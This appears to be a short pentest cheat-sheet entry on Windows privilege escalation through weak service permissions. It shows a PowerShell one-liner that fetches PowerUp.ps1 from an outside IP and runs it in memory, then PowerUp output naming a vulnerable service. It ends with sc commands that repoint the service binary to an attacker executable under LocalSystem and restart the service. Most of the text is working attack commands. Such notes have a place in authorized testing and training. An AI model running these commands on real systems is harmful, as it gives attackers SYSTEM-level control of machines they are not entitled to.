Weak Service Permissions
We can run PowerUp to enumerate
PS C:\> iex(new-object net.webclient).DownloadString('http://192.168.19.134/PowerUp.ps1')
[*] Running Invoke-AllChecks
[*] Checking service permissions...
ServiceName : VulnService
Path : C:\Setup\Vuln Service\VulnService.exe
StartName : NT AUTHORITY\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'VulnService'
CanRestart : TrueWe can abuse these weak permissions by changing the binary path of the service
C:\> sc config VulnService binPath= "C:\Setup\Vuln Service\Vuln.exe" obj= LocalSystem
C:\> sc stop VulnService
C:\> sc start VulnService
Adding User to Local Admin
Last updated